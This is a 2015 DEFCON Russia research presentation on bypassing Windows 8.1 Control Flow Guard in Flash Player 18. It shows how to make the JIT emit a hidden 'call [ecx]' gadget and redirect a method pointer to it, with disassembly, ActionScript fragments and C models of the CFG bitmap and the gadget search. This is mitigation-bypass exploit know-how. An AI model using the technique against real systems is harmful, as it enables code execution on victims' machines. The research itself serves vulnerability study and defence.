Saint Petersburg, 2015

Advanced CFG Bypass on Adobe Flash Player 18 and Windows 8.1

Yurii Drozdov
Liudmila Drozdova
Center of Vulnerability Research
DEFCON Russia (DCG# 7812)
Background
 CFG (Control Flow Guard) – validation of indirect call targets against a per-process bitmap
 Detailed CFG descriptions exist in many sources (see Links)
 Adobe Flash Player has been built with CFG since Windows 8.1 Update 3
 Adobe Flash CFG bypass before June 2015 – Core Security
 After June 2015 – this research
Experimental class

class ExploitClass {
    function func1(arg1, arg2, ..., argn) {
        func2(arg1, arg2, ..., argn);
    }
    function func2(arg1, arg2, ..., argn) {
        func3(arg1, arg2, ..., argn);
    }
    function func3(arg1, arg2, ..., argn) {
        ...
    }
}

All methods of ExploitClass are compiled to machine code by the ActionScript JIT compiler.
JIT-generated function call from JIT code (func1 calls func2)

56            push esi
50            push eax
51            push ecx
8bc8          mov ecx,eax
b840aa0f77    mov eax, LdrpValidateUserCallTarget (770faa40)
ffd0          call eax        -> CFG check: the target in ecx is looked up in the CFG bitmap, the process is aborted if its bit is not set
59            pop ecx
58            pop eax
ffd0          call eax        -> call of the validated function (func2)
83c410        add esp,10h
Saving parameters in JIT code for a JIT function

The instructions used for saving parameters to the frame can look like this

8b5de0          mov ebx,dword ptr [ebp-20h]
897d88          mov dword ptr [ebp-78h],edi
8b7de8          mov edi,dword ptr [ebp-18h]
89758c          mov dword ptr [ebp-74h],esi

or like this

8bbde8feffff    mov edi,dword ptr [ebp-118h]
898df4feffff    mov dword ptr [ebp-10Ch],ecx
8b8decfeffff    mov ecx,dword ptr [ebp-114h]
89b5c0feffff    mov dword ptr [ebp-140h],esi

Different opcodes! The first group uses an 8-bit displacement from ebp, the second a 32-bit one, and the 32-bit form carries FF bytes that the rest of this research builds on.
Key points
 Use one of the parameters of func2 as the controlled address
 The arguments are still on the stack in their original form
 Arguments are sometimes duplicated in registers
 One of the arguments can end up saved in ecx
 We can find and change the func2 pointer in the ExploitClass object
 So we can transfer control to any part of the JIT function, not only its entry
 The CFG bitmap for executable memory allocated with NtAllocateVirtualMemory (JIT memory) has all bits set to '1', so every byte in it is an accepted call target
 Transfer control to an EIP-changing instruction inside the JIT code – in our case an ecx-based control-transfer instruction
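The C model below is an added example, not part of the slides, and shows why the last two key points combine into a bypass at the bitmap level. It reproduces the two-bits-per-16-bytes layout that LdrpValidateUserCallTarget consults on 32-bit Windows 8.1, as described in the Trend Micro paper listed under Links; the window base 12600000, the image target 12600010 and the JIT page 126ae000 are assumed values, while 126aed07 is the call [ecx] address from the final slide. A CFG-enabled image only gets its function entry points marked, so an address in the middle of a function fails the check; the JIT region is marked block-wide, so an unintended instruction in the middle of func2 passes.

```c
#include <stdint.h>
#include <stdio.h>

/* Model of the 32-bit CFG bitmap that LdrpValidateUserCallTarget consults on
 * Windows 8.1 (layout as described in the Trend Micro paper in the Links):
 * every 16-byte block of address space owns two bits.  The even bit says the
 * 16-byte-aligned address of the block is an allowed call target, the odd bit
 * says every address inside the block is allowed.  The real bitmap covers the
 * whole address space; this model only covers a 1 MiB window starting at BASE
 * (an assumed address chosen so that the slide's 126aed07 falls inside it). */
#define BASE    0x12600000u
#define WINDOW  0x00100000u
#define BLOCKS  (WINDOW / 16u)

static uint8_t bitmap[BLOCKS * 2u / 8u];   /* two bits per 16-byte block */

static int  in_window(uint32_t addr) { return addr >= BASE && addr - BASE < WINDOW; }
static void set_bit(uint32_t bit) { bitmap[bit / 8u] |= (uint8_t)(1u << (bit % 8u)); }
static int  get_bit(uint32_t bit) { return (bitmap[bit / 8u] >> (bit % 8u)) & 1; }

/* What the loader records for a function-pointer target in a CFG-enabled
 * image: a 16-byte-aligned entry only sets the "aligned" bit, so no other
 * byte of that block (in particular no mid-function address) is accepted. */
void cfg_mark_image_target(uint32_t target)
{
    if (!in_window(target)) return;
    uint32_t block = (target - BASE) / 16u;
    set_bit(block * 2u);
    if (target & 0xFu) set_bit(block * 2u + 1u);  /* unaligned entry: whole block */
}

/* What Windows 8.1 did for executable memory obtained with
 * NtAllocateVirtualMemory (the JIT's code buffers): both bits of every block
 * are set, so any address in the region, including the middle of an
 * instruction, passes the check. */
void cfg_mark_jit_region(uint32_t start, uint32_t size)
{
    for (uint32_t a = start & ~0xFu; a < start + size; a += 16u) {
        if (!in_window(a)) continue;
        uint32_t block = (a - BASE) / 16u;
        set_bit(block * 2u);
        set_bit(block * 2u + 1u);
    }
}

/* Model of LdrpValidateUserCallTarget: returns 1 if the indirect call is
 * allowed, 0 where the real routine would abort the process. */
int cfg_validate(uint32_t target)
{
    if (!in_window(target)) return 0;
    uint32_t block = (target - BASE) / 16u;
    if ((target & 0xFu) == 0) return get_bit(block * 2u);
    return get_bit(block * 2u + 1u);
}

/* Scenario from the slides (all addresses assumed except 126aed07): one
 * legitimate target at 12600010 inside an image, and a JIT page at 126ae000
 * that contains the unintended call [ecx] bytes at 126aed07. */
int cfg_demo_validate(uint32_t target)
{
    static int ready;
    if (!ready) {
        cfg_mark_image_target(0x12600010u);
        cfg_mark_jit_region(0x126ae000u, 0x1000u);
        ready = 1;
    }
    return cfg_validate(target);
}

int main(void)
{
    const uint32_t probes[] = { 0x12600010u, 0x12600017u, 0x126aed07u, 0x126af000u };
    for (unsigned i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%08x -> %s\n", probes[i],
               cfg_demo_validate(probes[i]) ? "allowed" : "fastfail");
    return 0;
}
```

The mid-function image address 12600017 is rejected while the mid-instruction JIT address 126aed07 is accepted; nothing in the check distinguishes a function entry from an arbitrary byte once a region is marked block-wide.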
CALL ECX generation in func2

In JIT code a call ecx instruction does not normally exist, but we can try to generate one as an unintended instruction, i.e. from bytes that belong to:
 one big instruction
 two adjacent ones.

The call ecx opcode is FF D1.

We found the following options in our experimental module:
1. 33FF                       XOR EDI,EDI
   D1F8                       SAR EAX,1
2. 8B8D 04FFFFFF              MOV ECX,DWORD PTR [EBP-FC]
   D1E1                       SHL ECX,1
3. 898D 70FFFFFF              MOV DWORD PTR [EBP-90],ECX
   D1EB                       SHR EBX,1
4. 8D51 FF                    LEA EDX,DWORD PTR DS:[ECX-1]
   D1FE                       SAR ESI,1
5. C785 00FFFFFF D1000000     MOV DWORD PTR [EBP-100],0D1

In each case the FF is the last byte of the first instruction (a ModRM byte, a disp8 or a disp32) and D1 is the opcode of the next instruction or the low byte of the immediate. Options 2, 3 and 5 look like the parameter-saving code the JIT emits, so they are the candidates we can influence from ActionScript.
Instructions with different opcodes for saving parameters in JIT code

 Different encodings can be used for saving parameters. For example:
 C785 00FFFFFF 01000000   MOV DWORD PTR [EBP-100],1
 C745 8C 01000000         MOV DWORD PTR [EBP-74],1
 For the instruction MOV DWORD PTR [EBP-X], N:
 X > 0x80: the first variant (C7 85, 32-bit displacement) is generated
 X <= 0x80: the second variant (C7 45, 8-bit displacement) is generated
 The reason is the signed 8-bit displacement: -X fits in one byte only while X <= 0x80 (disp8 ranges from -128 to 127). In the disp32 form the displacement -X ends in FF FF FF for any realistic frame offset, so the byte just before the immediate is always FF.
How to force Flash to use the 'proper' parameter saving code?

 We need MOV DWORD PTR [EBP-X], N with X > 0x80, so that the disp32 variant is generated
 We can influence X in the JIT function via local variables, the number of other function calls inside the JIT function and the number of their parameters, all of which enlarge the frame
 We need to prepare func2 before the call of func3 and force Flash to use the first variant of the encoding
 So we added more local variables, additional calls, etc.
MOV DWORD PTR [EBP-X],0D1h

Attempt

function func2(arg1, arg2, ..., argn) {
    var localvar1;
    var localvar2;
    ....
    func3(arg1, arg2, ..., 0xD1, ..., argn);
}

Result

MOV EBX,18C731Eh
XOR EBX,18C73CFh          ; 18C731Eh xor 18C73CFh == 0D1h
MOV DWORD PTR [EBP-X],EBX

instead of

MOV DWORD PTR [EBP-X],0D1h

Fail: the JIT never stores 0xD1 as an immediate, it rebuilds the constant from two other constants, so the D1 byte does not appear in the code.
Alternative generation of call ecx

Using two instructions:

898D 70FFFFFF   MOV DWORD PTR [EBP-90],ECX
D1EB            SHR/SHL/... EBX,1

The attempt was

any_var1 = any_var2 << 1

but instead of the desired

D1E2            SHL EDX,1

we got the same instruction with the alternative encoding (probably because the JIT always emits the generic shift-by-immediate form):

C1E2 01         SHL EDX,1

Fail again: no D1 byte appears.
Alternative

 call dword ptr [ecx], opcode FF 11, is an alternative: the immediate we need is now 0x11
 Let's try to get MOV DWORD PTR [EBP-X],11h

MOV DWORD PTR [EBP-X],11h
Attempt

function func2(arg1, arg2, ..., argn) {
    var localvar1;
    var localvar2;
    ....
    func3(arg1, arg2, ..., 0x11, ..., argn);
}

Result

c78570ffffff11000000   mov dword ptr [ebp-90h],11h

Bingo! The bytes FF 11 at offset 5 of this instruction decode as call dword ptr [ecx].
Number obfuscation in JIT

Why did we get

c78570ffffff11000000   mov dword ptr [ebp-90h],11h

? Because 0x11 is not a big number for the JIT compiler and is not obfuscated. Obfuscation (constant blinding) of immediates begins at 0x80; numbers less than 0x80 are emitted as plain immediates, so they can be placed in the code bytes directly.
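The following C model is an added example, not Adobe's code, and ties together the disp8/disp32 rule from "Instructions with different opcodes", the 0x80 blinding threshold from this section and the byte search from "CALL ECX generation in func2". It emits the store of a constant to [ebp-X] with the displacement choice and the XOR blinding the slides observed, then scans the emitted bytes for FF D1 or FF 11 at any offset, ignoring instruction boundaries, which is exactly what CFG lets us do in JIT memory. The blinding key 018C731E is taken from the failed 0xD1 attempt; the exact blinding sequence and threshold are the slides' observations modelled as stated, not a reverse-engineered copy of the Flash JIT.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Byte-level model (an assumed simplification, not Adobe's code) of the two
 * code-generation rules the slides observed in the Flash Player 18 JIT:
 *  1. "mov dword ptr [ebp-X], imm32" is emitted with an 8-bit displacement
 *     (C7 45 disp8 imm32) while X <= 0x80 and with a 32-bit displacement
 *     (C7 85 disp32 imm32) otherwise;
 *  2. immediates >= 0x80 are blinded: the JIT emits "mov ebx, K; xor ebx,
 *     K^imm; mov [ebp-X], ebx", so the constant never appears in the code. */
#define BLIND_THRESHOLD 0x80u
#define BLIND_KEY       0x018C731Eu   /* the key seen in the slide's failed attempt */

static size_t put32(uint8_t *out, uint32_t v)
{
    out[0] = (uint8_t)v;         out[1] = (uint8_t)(v >> 8);
    out[2] = (uint8_t)(v >> 16); out[3] = (uint8_t)(v >> 24);
    return 4;
}

/* Emit "[ebp-x] = imm" the way the modelled JIT would; blind != 0 enables
 * rule 2.  Returns the number of bytes written (at most 17). */
size_t emit_store_const(uint8_t *out, uint32_t x, uint32_t imm, int blind)
{
    size_t n = 0;
    if (blind && imm >= BLIND_THRESHOLD) {
        out[n++] = 0xBB;  n += put32(out + n, BLIND_KEY);          /* mov ebx, K       */
        out[n++] = 0x81;  out[n++] = 0xF3;                         /* xor ebx, K^imm   */
        n += put32(out + n, BLIND_KEY ^ imm);
        if (x <= 0x80u) { out[n++] = 0x89; out[n++] = 0x5D; out[n++] = (uint8_t)(0u - x); }
        else            { out[n++] = 0x89; out[n++] = 0x9D; n += put32(out + n, 0u - x); }
        return n;                                                  /* mov [ebp-x], ebx */
    }
    if (x <= 0x80u) { out[n++] = 0xC7; out[n++] = 0x45; out[n++] = (uint8_t)(0u - x); }
    else            { out[n++] = 0xC7; out[n++] = 0x85; n += put32(out + n, 0u - x); }
    n += put32(out + n, imm);                                      /* mov [ebp-x], imm */
    return n;
}

/* Linear byte search for an unintended two-byte instruction at any offset of a
 * JIT buffer (FF D1 = call ecx, FF 11 = call dword ptr [ecx]).  Returns the
 * offset of the first hit or -1.  Unlike a disassembler it ignores instruction
 * boundaries: with JIT memory marked valid block-wide, CFG lets the code be
 * entered at any of these offsets. */
long find_gadget(const uint8_t *code, size_t len, uint8_t b0, uint8_t b1)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (code[i] == b0 && code[i + 1] == b1) return (long)i;
    return -1;
}

/* One of the slides' attempts: store imm into [ebp-x] and look for FF <b1>. */
long attempt(uint32_t x, uint32_t imm, uint8_t b1, int blind)
{
    uint8_t code[32];
    size_t n = emit_store_const(code, x, imm, blind);
    return find_gadget(code, n, 0xFF, b1);
}

int main(void)
{
    struct { const char *what; uint32_t x, imm; uint8_t b1; int blind; } cases[] = {
        { "0xD1 into [ebp-100h], no blinding (what we hoped for)", 0x100, 0xD1, 0xD1, 0 },
        { "0xD1 into [ebp-100h], blinded (what Flash emitted)",    0x100, 0xD1, 0xD1, 1 },
        { "0x11 into [ebp-74h], disp8 form",                        0x74, 0x11, 0x11, 1 },
        { "0x11 into [ebp-90h], disp32 form",                       0x90, 0x11, 0x11, 1 },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        uint8_t code[32];
        size_t n = emit_store_const(code, cases[i].x, cases[i].imm, cases[i].blind);
        printf("%-52s ", cases[i].what);
        for (size_t j = 0; j < n; j++) printf("%02x", code[j]);
        printf("  gadget at %ld\n", find_gadget(code, n, 0xFF, cases[i].b1));
    }
    return 0;
}
```

Only the last case yields a gadget: the disp32 form puts FF directly in front of the immediate, and 0x11 is below the blinding threshold so it survives as a literal byte. The same scan run over a real JIT buffer is how one confirms the call [ecx] address before overwriting the func2 pointer.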
Call to controlled address

 After func2 is JIT-compiled, we have a ready call [ecx] inside its code.
 During exploit execution we find the address of func2 inside our object and replace it with the address of the call [ecx] bytes in func2.
 The CFG check in func1 passes, because every address in JIT memory is marked as a valid target, and the following call func2 transfers control to the controlled address in ecx: CFG is bypassed.
 126aed07 ff11   call dword ptr [ecx]   ds:002b:42424242=????????
CFG Bypass
Links
 http://sjc1-te-ftp.trendmicro.com/assets/wp/exploring-control-flow-guard-in-windows10.pdf
 http://www.powerofcommunity.net/poc2014/mj0011.pdf
 https://blog.coresecurity.com/2015/03/25/exploiting-cve-2015-0311-part-ii-bypassing-control-flow-guard-on-windows-8-1-update-3/
 http://cvr-data.blogspot.ru/2015/07/advanced-cfg-bypass-on-adobe-flash.html
 https://helpx.adobe.com/security/products/flash-player/apsb15-11.html